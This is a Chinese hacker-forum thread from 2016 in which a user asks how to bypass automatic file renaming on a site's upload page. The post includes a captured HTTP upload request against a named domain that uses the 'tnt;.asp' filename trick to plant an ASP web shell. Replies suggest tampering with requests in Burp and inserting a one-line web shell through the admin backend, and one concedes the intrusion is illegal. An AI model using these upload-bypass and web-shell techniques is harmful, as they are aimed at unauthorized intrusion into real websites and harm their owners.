上传文件自动命名大牛指点怎么突破

zjcak 发表于 2016-4-15 02:48:43

本帖最后由 wuyan 于 2016-4-15 08:11 编辑

POST /admin/upload.asp?action=admin&submit=admin HTTP/1.1
Host: pdsgysyj.com
Content-Length: 7557
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://pdsgysyj.com
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Maxthon/4.0 Chrome/30.0.1599.101 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary2GRmdQRbVWAgpokZ
DNT: 1
Referer: http://xxxxxx.xxx/admin/upload.asp?action=admin&submit=admin 上传点可以打开
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN
Cookie: ASPSESSIONIDCSAARDQD=NLPFEDODKAMGMIMDFDIHJMEE

------WebKitFormBoundary2GRmdQRbVWAgpokZ
Content-Disposition: form-data; name="file"; filename="tnt;.asp"
Content-Type: image/jpeg

卓儿~ 发表于 2016-4-16 12:21:06

这个点无法截断

zjcak 发表于 2016-4-16 14:28:40

是的接不断，

空城发表于 2016-4-16 19:00:29

有注入，但是非法。

Kir_0to 发表于 2016-4-18 19:58:55

我也是碰到个这样的自动重命名自动改格式。。。

bm1998 发表于 2016-5-9 15:30:52

测试burp或者改包实在不行就直接后台添加后缀，在不行变态点直接插一句话在后台，在不行直接去跳河！！！

linghun 发表于 2016-5-23 12:14:50

66666666666666666666666

wanshine 发表于 2016-6-6 14:41:51

我就是来看看

页: [1]

红客联盟 - 由08安全团队运营's Archiver

上传文件自动命名大牛指点怎么突破